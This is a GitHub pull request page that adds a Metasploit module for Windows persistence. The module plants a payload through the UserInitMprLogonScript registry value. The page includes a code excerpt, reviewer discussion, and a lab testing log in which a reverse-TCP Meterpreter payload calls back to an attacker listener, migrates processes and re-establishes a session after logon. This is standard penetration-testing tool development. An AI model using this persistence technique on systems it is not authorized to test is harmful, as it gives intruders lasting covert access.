windows persistence userinit_mpr_logon#21032
Merged
smcintyre-r7 merged 4 commits intorapid7:masterfrom Apr 1, 2026
Merged
Conversation
bwatters-r7
reviewed
Mar 5, 2026
| fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe) | ||
|
|
||
| old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript') | ||
| registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ') |
Contributor
There was a problem hiding this comment.
Curious how much space we are allowed here? Could we bas64 encode the binary payload, echo it to the temp directory, then execute it?
Contributor
Author
There was a problem hiding this comment.
REG_SZ values can be large (~1 MB), UserInitMprLogonScript is executed as a command at logon, so it is constrained by Windows command line limits. Microsoft documents ~8191 characters for cmd.exe and about 32767 for the underlying Windows API (CreateProcess) . Since base64 increases payload size by ~33%, embedding a full binary payload in the registry value would likely exceed these limits.
Contributor
|
Dependent on #21049 |
smcintyre-r7
previously requested changes
Mar 30, 2026
modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
Outdated
Show resolved
Hide resolved
github-project-automation
bot
moved this from Todo
to Waiting on Contributor
in Metasploit Kanban
Nayeraneru
force-pushed
the
UserInitMprLogon
branch
from
01f27bf to
6a1c643
Compare
smcintyre-r7
reviewed
Apr 1, 2026
Contributor
smcintyre-r7
left a comment
smcintyre-r7
left a comment
There was a problem hiding this comment.
Changes look good now and I was able to successfully test the module. I'll have this landed in a moment.
Testing Output
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
(reverse-i-search)` set': useInterrupt: use the 'exit' command to quit
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Windows\TEMP\yozkGTE.exe
[*] Meterpreter-compatible Cleanup RC file: /home/smcintyre/.msf4/logs/persistence/DC_20260401.5451/DC_20260401.5451.rc
msf exploit(windows/persistence/userinit_mpr_logon_script) >
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444
1 Exploit: windows/persistence/userinit_mpr_logon_script windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444 (setting up)
msf exploit(windows/persistence/userinit_mpr_logon_script) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > ls C:\\Windows\\TEMP
Listing: C:\Windows\TEMP
========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 0 fil 2026-03-31 11:46:35 -0400 BUPBGDNjeF.txt
040777/rwxrwxrwx 0 dir 2024-06-11 16:22:44 -0400 CA1B4E57-871F-4E0C-945B-7FA7964DA012
100666/rw-rw-rw- 0 fil 2026-04-01 14:29:59 -0400 EEtoXVqiauOsWNgl.txt
100777/rwxrwxrwx 197632 fil 2026-04-01 14:31:37 -0400 HAjFCqjL.exe
100666/rw-rw-rw- 934736 fil 2026-04-01 12:57:37 -0400 MpCmdRun.log
100666/rw-rw-rw- 315310 fil 2026-04-01 12:57:05 -0400 MpSigStub.log
100777/rwxrwxrwx 197632 fil 2026-03-31 11:46:16 -0400 MxVtAwgcRh.exe
100777/rwxrwxrwx 197632 fil 2026-04-01 14:30:52 -0400 NSAUiOEFsht.exe
100666/rw-rw-rw- 0 fil 2026-04-01 14:31:37 -0400 SLYtMOatookFpT.txt
100777/rwxrwxrwx 197632 fil 2026-03-31 11:46:35 -0400 WnPCwxcWsQ.exe
100666/rw-rw-rw- 0 fil 2026-04-01 14:33:12 -0400 XlLZuWCT.txt
100666/rw-rw-rw- 0 fil 2026-04-01 14:30:52 -0400 XvDGTAexlGCd.txt
100777/rwxrwxrwx 239104 fil 2026-04-01 14:33:12 -0400 aToqzlrkMJl.exe
100666/rw-rw-rw- 53 fil 2026-04-01 12:46:34 -0400 bb3a785178f443fda931098a5a9a306b.db.ses
100777/rwxrwxrwx 239104 fil 2026-04-01 14:29:59 -0400 iDjtbgQPs.exe
100666/rw-rw-rw- 0 fil 2026-03-31 11:46:16 -0400 sCoOOlxASHS.txt
100666/rw-rw-rw- 102 fil 2026-04-01 12:47:17 -0400 silconfig.log
040777/rwxrwxrwx 0 dir 2026-03-31 11:43:33 -0400 vmware-SYSTEM
100666/rw-rw-rw- 421473 fil 2026-04-01 12:46:34 -0400 vmware-vmsvc-SYSTEM.log
100666/rw-rw-rw- 8330 fil 2026-04-01 12:46:33 -0400 vmware-vmtoolsd-SYSTEM.log
100666/rw-rw-rw- 2940 fil 2026-04-01 14:55:32 -0400 vmware-vmtoolsd-smcintyre.log
100666/rw-rw-rw- 98454 fil 2026-04-01 14:55:43 -0400 vmware-vmusr-smcintyre.log
100666/rw-rw-rw- 8177 fil 2026-04-01 12:46:36 -0400 vmware-vmvss-SYSTEM.log
100777/rwxrwxrwx 7680 fil 2026-04-01 14:54:50 -0400 yozkGTE.exe
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
84 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
104 4 Registry x64 0
308 4 smss.exe x64 0
376 2488 sihost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\sihost.exe
420 408 csrss.exe x64 0
520 596 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
524 408 wininit.exe x64 0
532 516 csrss.exe x64 1
596 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
664 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
668 524 services.exe x64 0
688 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
712 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
824 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
888 940 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
904 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
924 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
940 344 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
968 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1032 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1084 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1100 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1124 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1144 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1188 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1276 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1328 924 ShellExperienceHost.exe x64 1 MSFLAB\smcintyre C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1420 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1428 4940 ServerManager.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\ServerManager.exe
1496 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1536 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1568 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1576 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1584 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1668 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1724 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1772 668 svchost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\svchost.exe
1828 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1848 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1868 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1940 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1984 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1992 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2000 380 explorer.exe x64 1 MSFLAB\smcintyre C:\Windows\explorer.exe
2040 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2068 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2072 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2188 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2196 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2276 668 svchost.exe x64 0
2328 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2384 924 SearchUI.exe x64 1 MSFLAB\smcintyre C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
2488 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2520 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2736 924 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2804 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2964 524 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
2968 596 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
3124 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3132 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3140 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3148 668 certsrv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\certsrv.exe
3160 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3224 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3236 668 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3256 668 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3308 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3320 668 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3328 668 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3388 668 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3396 668 inetinfo.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\inetsrv\inetinfo.exe
3404 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3412 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3424 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3440 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3480 668 vm3dservice.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vm3dservice.exe
3492 668 MsMpEng.exe x64 0
3516 668 sshd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\OpenSSH\sshd.exe
3528 668 MpDefenderCoreService.exe x64 0
3632 668 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
3648 668 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3724 668 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3796 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
3824 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4108 3480 vm3dservice.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\vm3dservice.exe
4124 924 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
4380 924 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4384 668 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
4528 668 sqlceip.exe x64 0 NT SERVICE\SQLTELEMETRY C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlceip.exe
4544 668 sqlservr.exe x64 0 NT SERVICE\MSSQLSERVER C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
4620 668 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4732 668 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
4792 1940 ctfmon.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\ctfmon.exe
4932 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4960 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5080 924 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
5380 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5604 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5756 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5796 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
5848 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
5980 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6252 924 backgroundTaskHost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\backgroundTaskHost.exe
6288 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6316 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6396 1828 taskhostw.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\taskhostw.exe
6408 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6520 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
6824 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6896 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6912 668 svchost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\svchost.exe
7112 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
7236 924 smartscreen.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\smartscreen.exe
7308 2000 vmtoolsd.exe x64 1 MSFLAB\smcintyre C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
7424 7380 jusched.exe x86 1 MSFLAB\smcintyre C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
meterpreter > migrate 6912
[*] Migrating from 940 to 6912...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf exploit(windows/persistence/userinit_mpr_logon_script) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 2.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[!] Payload handler is disabled, the persistence will be installed only.
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\SMCINT~1\AppData\Local\Temp\pHUNXGBwHWmT.exe
[*] Meterpreter-compatible Cleanup RC file: /home/smcintyre/.msf4/logs/persistence/DC_20260401.5643/DC_20260401.5643.rc
[*] 192.168.159.10 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (244806 bytes) to 192.168.159.10
msf exploit(windows/persistence/userinit_mpr_logon_script) >
msf exploit(windows/persistence/userinit_mpr_logon_script) > [*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:53820) at 2026-04-01 14:57:01 -0400
msf exploit(windows/persistence/userinit_mpr_logon_script) >
Thanks for submitting this to us!
smcintyre-r7
dismissed
their stale review
This has been rebased so the library changes have been implemented and the old pattern removed.
smcintyre-r7
approved these changes
Apr 1, 2026
github-project-automation
bot
moved this from Waiting on Contributor
to In Progress
in Metasploit Kanban
Contributor
Release NotesThis adds a new Windows persistence module that abuses the |
smcintyre-r7
added
module
docs
rn-modules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
4 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR fixes #20821 by implementing a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.
Verification
msfconsoleuse exploit/windows/persistence/userinit_mpr_logon_scriptset SESSION <id>set LHOST <attacker_ip>set LPORT <attacker_port>set PAYLOAD_NAME updaterset WRITABLEDIR C:\\Users\\<user_name>\\AppData\\Roamingset CleanUpRc trueset VERBOSE truecheckrunA scenario example in the documentation